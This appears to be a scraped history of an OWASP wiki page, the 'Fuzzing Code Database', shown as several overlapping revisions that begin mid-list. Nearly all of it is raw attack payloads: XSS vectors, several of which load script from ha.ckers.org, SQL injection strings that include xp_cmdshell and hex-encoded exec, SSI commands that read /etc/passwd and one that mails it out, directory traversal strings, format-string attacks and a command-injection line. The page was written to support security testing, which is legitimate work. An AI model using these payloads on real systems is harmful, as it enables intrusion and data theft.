<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script><br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20910
Category:OWASP Fuzzing Code Database
2007-08-19T22:22:41Z
<p>Foobar23: /* XSS Statements */ New statements</p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect and combine all these statements, merging the databases of several projects like [[WebScarab]] and [[JBroFuzz]], to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".''<br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <br />
'';!--"<XSS>=&{()}<br />
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT><br />
<IMG SRC="javascript:alert('XSS');"><br />
<IMG SRC=javascript:alert('XSS')><br />
<IMG SRC=JaVaScRiPt:alert('XSS')><br />
<IMG SRC=javascript:alert(&quot;XSS&quot;)><br />
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`><br />
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"><br />
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))><br />
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;><br />
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041><br />
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29><br />
<IMG SRC="jav ascript:alert('XSS');"><br />
<IMG SRC="jav&#x09;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0A;ascript:alert('XSS');"><br />
<IMG SRC="jav&#x0D;ascript:alert('XSS');"><br />
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out<br />
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out<br />
<IMG SRC=" &#14; javascript:alert('XSS');"><br />
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")><br />
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<<SCRIPT>alert("XSS");//<</SCRIPT><br />
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B><br />
<SCRIPT SRC=//ha.ckers.org/.j><br />
<IMG SRC="javascript:alert('XSS')"<br />
<iframe src=http://ha.ckers.org/scriptlet.html <<br />
<SCRIPT>a=/XSS/\nalert(a.source)</SCRIPT><br />
\";alert('XSS');//<br />
</TITLE><SCRIPT>alert("XSS");</SCRIPT><br />
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"><br />
<BODY BACKGROUND="javascript:alert('XSS')"><br />
<BODY ONLOAD=alert('XSS')><br />
<IMG DYNSRC="javascript:alert('XSS')"><br />
<IMG LOWSRC="javascript:alert('XSS')"><br />
<BGSOUND SRC="javascript:alert('XSS');"><br />
<BR SIZE="&{alert('XSS')}"><br />
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER><br />
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"><br />
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"><br />
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE><br />
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"><br />
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE><br />
<XSS STYLE="behavior: url(xss.htc);"><br />
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS<br />
<IMG SRC='vbscript:msgbox("XSS")'><br />
¼script¾alert(¢XSS¢)¼/script¾<br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"><br />
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"><br />
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"><br />
<IFRAME SRC="javascript:alert('XSS');"></IFRAME><br />
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET><br />
<TABLE BACKGROUND="javascript:alert('XSS')"><br />
<TABLE><TD BACKGROUND="javascript:alert('XSS')"><br />
<DIV STYLE="background-image: url(javascript:alert('XSS'))"><br />
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"><br />
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"><br />
<DIV STYLE="width: expression(alert('XSS'));"><br />
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE><br />
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"><br />
<XSS STYLE="xss:expression(alert('XSS'))"><br />
exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'><br />
<STYLE TYPE="text/javascript">alert('XSS');</STYLE><br />
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A><br />
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><br />
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--><br />
<BASE HREF="javascript:alert('XSS');//"><br />
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT><br />
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT><br />
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED><br />
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED><br />
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML><br />
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN><br />
<XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN><br />
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML><br />
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT><br />
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--><br />
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?><br />
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"><br />
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-<br />
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT><br />
<A HREF="http://66.102.7.147/">XSS</A><br />
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A><br />
<A HREF="http://1113982867/">XSS</A><br />
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A><br />
<A HREF="http://0102.0146.0007.00000223/">XSS</A><br />
<A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A><br />
<A HREF="//www.google.com/">XSS</A><br />
<A HREF="//google">XSS</A><br />
<A HREF="http://google.com/">XSS</A><br />
<A HREF="http://www.google.com./">XSS</A><br />
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A><br />
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"><br />
<div onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="javascript:document.write("XSS-XSS-XSS");"><br />
<img dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"><br />
<bgsound src="javascript:document.write("XSS-XSS-XSS");"><br />
&<script>document.write("XSS-XSS-XSS");</script><br />
&{document.write("XSS-XSS-XSS");};<br />
<img src=&{document.write("XSS-XSS-XSS");};><br />
<link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"><br />
<iframe src="vbscript:document.write("XSS-XSS-XSS");"><br />
<img src="mocha:document.write("XSS-XSS-XSS");"><br />
<img src="livescript:document.write("XSS-XSS-XSS");"><br />
<a href="about:<s&#99;ript>document.write("XSS-XSS-XSS");</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"><br />
<body onload="document.write("XSS-XSS-XSS");"><br />
<div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression(document.write("XSS-XSS-XSS"););"><br />
<style type="text/javascript">document.write("XSS-XSS-XSS");</style><br />
<object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"><br />
<style><!--</style><script>document.write("XSS-XSS-XSS");//--></script><br />
<![CDATA[<!--]]><script>document.write("XSS-XSS-XSS");//--></script><br />
<!-- -- --><script>document.write("XSS-XSS-XSS");</script><!-- -- --><br />
<<script>document.write("XSS-XSS-XSS");</script><br />
<img src="blah"onmouseover="document.write("XSS-XSS-XSS");"><br />
<img src="blah>" onmouseover="document.write("XSS-XSS-XSS");"><br />
<xml src="javascript:document.write("XSS-XSS-XSS");"><br />
<xml id="X"><a><b>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script><br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20479
Category:OWASP Fuzzing Code Database
2007-07-30T13:58:59Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect and combine all these statements, merging the databases of several projects like [[WebScarab]] and [[JBroFuzz]], to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
